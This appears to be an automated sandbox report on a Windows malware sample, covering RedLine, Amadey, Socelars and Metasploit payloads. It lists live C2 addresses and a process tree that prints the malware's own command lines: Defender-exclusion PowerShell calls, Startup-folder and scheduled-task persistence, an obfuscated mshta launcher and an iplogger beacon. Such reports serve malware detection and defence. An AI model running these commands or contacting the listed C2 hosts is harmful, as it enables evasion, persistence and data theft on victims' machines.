Overview

overview

10

Static

static

ad95953f11...b5.exe

windows7_x64

10

ad95953f11...b5.exe

windows10_x64

10

Analysis

  • max time kernel
    28s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    29/11/2021, 06:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ad95953f1162d1179340da7c4b087fb5.exe

  • Size

    10.3MB

  • MD5

    ad95953f1162d1179340da7c4b087fb5

  • SHA1

    d3eab9147bb6482ccb5e45aa4c12ff9671ed4448

  • SHA256

    501db6290affecf31a95c2fb5e1b93e047aa3a1cc93657891fd90c0f7bb16830

  • SHA512

    9a2842484196b14ee635bfd581baa2fa16ae8a3015e3d00852cf6a425392f031bc2f178b7af856215613b093c4d708e719948a942088b11458f541ff3ec79c60

Score
10/10
amadeymetasploitredlinesocelarsfakerudptestbackdoorevasioninfostealerpersistencespywarestealertrojanvmprotect

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

amadey

Version

2.82

C2

185.215.113.45/g4MbvE/index.php

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

udptest

C2

193.56.146.64:65441

Extracted

Family

redline

Botnet

Faker

C2

51.79.188.112:7110

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 9 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs
    evasiontrojan
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Downloads MZ/PE file
  • Executes dropped EXE 15 IoCs
  • VMProtect packed file 8 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 52 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 4 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 22 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 6 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:872
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {E3943D59-59C1-4193-8406-AAA1E4301C15} S-1-5-21-103686315-404690609-2047157615-1000:EDWYFHKN\Admin:Interactive:[1]
      2⤵
        PID:3048
        • C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
          C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
          3⤵
            PID:2308
      • C:\Windows\system32\services.exe
        C:\Windows\system32\services.exe
        1⤵
          PID:464
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:2684
        • C:\Users\Admin\AppData\Local\Temp\ad95953f1162d1179340da7c4b087fb5.exe
          "C:\Users\Admin\AppData\Local\Temp\ad95953f1162d1179340da7c4b087fb5.exe"
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:764
          • C:\Users\Admin\AppData\Local\Temp\Folder.exe
            "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1476
            • C:\Users\Admin\AppData\Local\Temp\Folder.exe
              "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -u
              3⤵
              • Executes dropped EXE
              PID:1540
          • C:\Users\Admin\AppData\Local\Temp\Gttinstall.exe
            "C:\Users\Admin\AppData\Local\Temp\Gttinstall.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks whether UAC is enabled
            • Suspicious use of WriteProcessMemory
            PID:1040
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processs.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processs.exe"
              3⤵
                PID:952
                • C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
                  "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:1960
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
                    5⤵
                      PID:892
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:952
                    • C:\Windows\SysWOW64\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F
                      5⤵
                      • Creates scheduled task(s)
                      PID:1724
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1kdxu7
                  3⤵
                    PID:984
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:984 CREDAT:275457 /prefetch:2
                      4⤵
                        PID:2620
                  • C:\Users\Admin\AppData\Local\Temp\lzinstall.exe
                    "C:\Users\Admin\AppData\Local\Temp\lzinstall.exe"
                    2⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1004
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\lsginstall.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lsginstall.exe"
                      3⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Adds Run key to start application
                      • Checks whether UAC is enabled
                      • Suspicious use of SetThreadContext
                      • Drops file in Windows directory
                      • Suspicious behavior: EnumeratesProcesses
                      • System policy modification
                      PID:1608
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lsginstall.exe" -Force
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:892
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe" -Force
                        4⤵
                          PID:2116
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lsginstall.exe" -Force
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2324
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe" -Force
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2368
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"
                          4⤵
                            PID:2764
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                            4⤵
                              PID:2836
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              4⤵
                                PID:2856
                          • C:\Users\Admin\AppData\Local\Temp\prxinstall.exe
                            "C:\Users\Admin\AppData\Local\Temp\prxinstall.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1064
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\udptest.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\udptest.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:684
                          • C:\Users\Admin\AppData\Local\Temp\SoCleanerInst4234.exe
                            "C:\Users\Admin\AppData\Local\Temp\SoCleanerInst4234.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1336
                            • C:\Users\Admin\AppData\Roaming\5065830.exe
                              "C:\Users\Admin\AppData\Roaming\5065830.exe"
                              3⤵
                                PID:2940
                              • C:\Users\Admin\AppData\Roaming\7038060.exe
                                "C:\Users\Admin\AppData\Roaming\7038060.exe"
                                3⤵
                                  PID:2832
                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                    4⤵
                                      PID:2284
                                  • C:\Users\Admin\AppData\Roaming\8733402.exe
                                    "C:\Users\Admin\AppData\Roaming\8733402.exe"
                                    3⤵
                                      PID:2788
                                    • C:\Users\Admin\AppData\Roaming\654768.exe
                                      "C:\Users\Admin\AppData\Roaming\654768.exe"
                                      3⤵
                                        PID:1560
                                      • C:\Users\Admin\AppData\Roaming\3350530.exe
                                        "C:\Users\Admin\AppData\Roaming\3350530.exe"
                                        3⤵
                                          PID:1480
                                          • C:\Users\Admin\AppData\Roaming\5498884.exe
                                            "C:\Users\Admin\AppData\Roaming\5498884.exe"
                                            4⤵
                                              PID:1700
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" vBsCRiPt: ClOSe (creaTeObJeCt( "wsCRipt.ShElL" ).RuN ( "C:\Windows\system32\cmd.exe /r COPY /Y ""C:\Users\Admin\AppData\Roaming\5498884.exe"" EIDV~dVXKv.exE && start EIDV~DVXKV.eXE /Pj7sX9F8mGQQ~eZI2L1yqRK& if """" == """" for %I in (""C:\Users\Admin\AppData\Roaming\5498884.exe"" ) do taskkill /im ""%~NxI"" /f " , 0 , TRue ) )
                                                5⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2116
                                            • C:\Users\Admin\AppData\Roaming\7927484.exe
                                              "C:\Users\Admin\AppData\Roaming\7927484.exe"
                                              4⤵
                                                PID:2756
                                            • C:\Users\Admin\AppData\Roaming\7330477.exe
                                              "C:\Users\Admin\AppData\Roaming\7330477.exe"
                                              3⤵
                                                PID:2904
                                            • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Modifies system certificate store
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1688
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                3⤵
                                                  PID:2792
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:2916
                                              • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:1116
                                                • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
                                                  3⤵
                                                    PID:2480
                                                • C:\Users\Admin\AppData\Local\Temp\Files.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:1860
                                                • C:\Users\Admin\AppData\Local\Temp\File.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\File.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  • Loads dropped DLL
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1036
                                                  • C:\Users\Admin\Pictures\Adobe Films\TOZKh2BkPjj3dtyhdpVmsLDf.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\TOZKh2BkPjj3dtyhdpVmsLDf.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3032
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1424
                                                    3⤵
                                                    • Program crash
                                                    PID:1712
                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                1⤵
                                                • Modifies Internet Explorer settings
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2192
                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2192 CREDAT:275457 /prefetch:2
                                                  2⤵
                                                  • Modifies Internet Explorer settings
                                                  PID:2536
                                              • C:\Windows\system32\rundll32.exe
                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                1⤵
                                                • Process spawned unexpected child process
                                                PID:2288
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2388
                                              • C:\Windows\system32\makecab.exe
                                                "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211129062900.log C:\Windows\Logs\CBS\CbsPersist_20211129062900.cab
                                                1⤵
                                                  PID:2912
                                                • C:\Program Files\Internet Explorer\iexplore.exe
                                                  "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                  1⤵
                                                    PID:2936
                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:275457 /prefetch:2
                                                      2⤵
                                                        PID:2252

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • memory/684-171-0x0000000004894000-0x0000000004896000-memory.dmp

                                                      Filesize

                                                      8KB

                                                      Download

                                                    • memory/684-126-0x0000000000270000-0x00000000002A9000-memory.dmp

                                                      Filesize

                                                      228KB

                                                      Download

                                                    • memory/684-127-0x0000000000400000-0x0000000000463000-memory.dmp

                                                      Filesize

                                                      396KB

                                                      Download

                                                    • memory/684-129-0x0000000004891000-0x0000000004892000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/684-154-0x0000000004892000-0x0000000004893000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/684-164-0x0000000004893000-0x0000000004894000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/684-159-0x00000000021E0000-0x000000000220C000-memory.dmp

                                                      Filesize

                                                      176KB

                                                      Download

                                                    • memory/684-125-0x0000000000240000-0x000000000026B000-memory.dmp

                                                      Filesize

                                                      172KB

                                                      Download

                                                    • memory/684-145-0x0000000001FA0000-0x0000000001FCE000-memory.dmp

                                                      Filesize

                                                      184KB

                                                      Download

                                                    • memory/764-55-0x0000000076A21000-0x0000000076A23000-memory.dmp

                                                      Filesize

                                                      8KB

                                                      Download

                                                    • memory/872-189-0x0000000001240000-0x00000000012B2000-memory.dmp

                                                      Filesize

                                                      456KB

                                                      Download

                                                    • memory/872-187-0x0000000000920000-0x000000000096D000-memory.dmp

                                                      Filesize

                                                      308KB

                                                      Download

                                                    • memory/892-323-0x0000000002452000-0x0000000002454000-memory.dmp

                                                      Filesize

                                                      8KB

                                                      Download

                                                    • memory/892-209-0x0000000002450000-0x0000000002451000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/892-321-0x0000000002451000-0x0000000002452000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/952-130-0x0000000000860000-0x0000000000E81000-memory.dmp

                                                      Filesize

                                                      6.1MB

                                                      Download

                                                    • memory/1036-197-0x0000000003B90000-0x0000000003CDC000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                      Download

                                                    • memory/1116-151-0x0000000002A10000-0x0000000002E1F000-memory.dmp

                                                      Filesize

                                                      4.1MB

                                                      Download

                                                    • memory/1116-153-0x0000000002E20000-0x00000000036C2000-memory.dmp

                                                      Filesize

                                                      8.6MB

                                                      Download

                                                    • memory/1116-155-0x0000000000400000-0x0000000000CBD000-memory.dmp

                                                      Filesize

                                                      8.7MB

                                                      Download

                                                    • memory/1336-173-0x0000000004720000-0x0000000004721000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1336-156-0x00000000004B0000-0x00000000004D7000-memory.dmp

                                                      Filesize

                                                      156KB

                                                      Download

                                                    • memory/1336-132-0x0000000000D00000-0x0000000000D01000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1480-334-0x0000000000590000-0x0000000000591000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1560-331-0x00000000002C0000-0x0000000000306000-memory.dmp

                                                      Filesize

                                                      280KB

                                                      Download

                                                    • memory/1560-333-0x0000000000120000-0x0000000000121000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1560-336-0x00000000010F0000-0x00000000010F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1608-160-0x00000000002F0000-0x00000000002F3000-memory.dmp

                                                      Filesize

                                                      12KB

                                                      Download

                                                    • memory/1608-184-0x00000000041B0000-0x00000000041CB000-memory.dmp

                                                      Filesize

                                                      108KB

                                                      Download

                                                    • memory/1608-128-0x0000000000200000-0x0000000000201000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1608-165-0x0000000004730000-0x0000000004731000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1608-200-0x0000000004690000-0x000000000469B000-memory.dmp

                                                      Filesize

                                                      44KB

                                                      Download

                                                    • memory/1608-169-0x00000000006F0000-0x000000000074E000-memory.dmp

                                                      Filesize

                                                      376KB

                                                      Download

                                                    • memory/1608-198-0x00000000007D0000-0x00000000007DC000-memory.dmp

                                                      Filesize

                                                      48KB

                                                      Download

                                                    • memory/1608-195-0x0000000004660000-0x00000000046A9000-memory.dmp

                                                      Filesize

                                                      292KB

                                                      Download

                                                    • memory/1608-192-0x00000000007D0000-0x00000000007D9000-memory.dmp

                                                      Filesize

                                                      36KB

                                                      Download

                                                    • memory/1712-319-0x00000000002A0000-0x00000000002A1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1960-163-0x0000000001180000-0x00000000017A1000-memory.dmp

                                                      Filesize

                                                      6.1MB

                                                      Download

                                                    • memory/2116-324-0x0000000001D12000-0x0000000001D14000-memory.dmp

                                                      Filesize

                                                      8KB

                                                      Download

                                                    • memory/2116-212-0x0000000001D11000-0x0000000001D12000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2116-211-0x0000000001D10000-0x0000000001D11000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2284-244-0x0000000000310000-0x0000000000311000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2284-332-0x00000000049E0000-0x00000000049E1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2324-327-0x00000000024F0000-0x000000000313A000-memory.dmp

                                                      Filesize

                                                      12.3MB

                                                      Download

                                                    • memory/2324-322-0x00000000024F0000-0x000000000313A000-memory.dmp

                                                      Filesize

                                                      12.3MB

                                                      Download

                                                    • memory/2324-326-0x00000000024F0000-0x000000000313A000-memory.dmp

                                                      Filesize

                                                      12.3MB

                                                      Download

                                                    • memory/2368-213-0x0000000000521000-0x0000000000522000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2368-210-0x0000000000520000-0x0000000000521000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2368-214-0x0000000002540000-0x0000000002583000-memory.dmp

                                                      Filesize

                                                      268KB

                                                      Download

                                                    • memory/2368-325-0x0000000000522000-0x0000000000524000-memory.dmp

                                                      Filesize

                                                      8KB

                                                      Download

                                                    • memory/2388-188-0x00000000006A0000-0x00000000006FD000-memory.dmp

                                                      Filesize

                                                      372KB

                                                      Download

                                                    • memory/2388-186-0x0000000001DD0000-0x0000000001ED1000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                      Download

                                                    • memory/2684-317-0x00000000004F0000-0x000000000050B000-memory.dmp

                                                      Filesize

                                                      108KB

                                                      Download

                                                    • memory/2684-318-0x0000000003270000-0x0000000003375000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                      Download

                                                    • memory/2684-225-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp

                                                      Filesize

                                                      8KB

                                                      Download

                                                    • memory/2684-190-0x00000000000E0000-0x000000000012D000-memory.dmp

                                                      Filesize

                                                      308KB

                                                      Download

                                                    • memory/2684-194-0x0000000000470000-0x00000000004E2000-memory.dmp

                                                      Filesize

                                                      456KB

                                                      Download

                                                    • memory/2756-338-0x0000000000400000-0x000000000362C000-memory.dmp

                                                      Filesize

                                                      50.2MB

                                                      Download

                                                    • memory/2788-237-0x0000000074D00000-0x0000000074D4A000-memory.dmp

                                                      Filesize

                                                      296KB

                                                      Download

                                                    • memory/2788-239-0x0000000000BE0000-0x0000000000D2B000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                      Download

                                                    • memory/2788-337-0x0000000002900000-0x0000000002901000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2788-240-0x0000000000370000-0x0000000000371000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2788-330-0x0000000000370000-0x00000000003B0000-memory.dmp

                                                      Filesize

                                                      256KB

                                                      Download

                                                    • memory/2788-329-0x0000000000320000-0x0000000000366000-memory.dmp

                                                      Filesize

                                                      280KB

                                                      Download

                                                    • memory/2832-232-0x0000000001300000-0x0000000001301000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2832-234-0x0000000000470000-0x0000000000471000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2832-328-0x00000000049B0000-0x00000000049B1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2856-201-0x0000000000400000-0x0000000000420000-memory.dmp

                                                      Filesize

                                                      128KB

                                                      Download

                                                    • memory/2856-202-0x0000000000400000-0x0000000000420000-memory.dmp

                                                      Filesize

                                                      128KB

                                                      Download

                                                    • memory/2856-203-0x0000000000400000-0x0000000000420000-memory.dmp

                                                      Filesize

                                                      128KB

                                                      Download

                                                    • memory/2856-205-0x0000000000400000-0x0000000000420000-memory.dmp

                                                      Filesize

                                                      128KB

                                                      Download

                                                    • memory/2856-206-0x0000000000400000-0x0000000000420000-memory.dmp

                                                      Filesize

                                                      128KB

                                                      Download

                                                    • memory/2856-316-0x0000000004C90000-0x0000000004C91000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2856-216-0x0000000000400000-0x0000000000420000-memory.dmp

                                                      Filesize

                                                      128KB

                                                      Download

                                                    • memory/2904-335-0x0000000004BA0000-0x0000000004BA1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2940-320-0x00000000046F0000-0x00000000046F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2940-226-0x0000000000290000-0x0000000000291000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2940-228-0x00000000003D0000-0x00000000003D1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2940-229-0x00000000004E0000-0x000000000050C000-memory.dmp

                                                      Filesize

                                                      176KB

                                                      Download

                                                    • memory/2940-230-0x0000000000300000-0x0000000000301000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download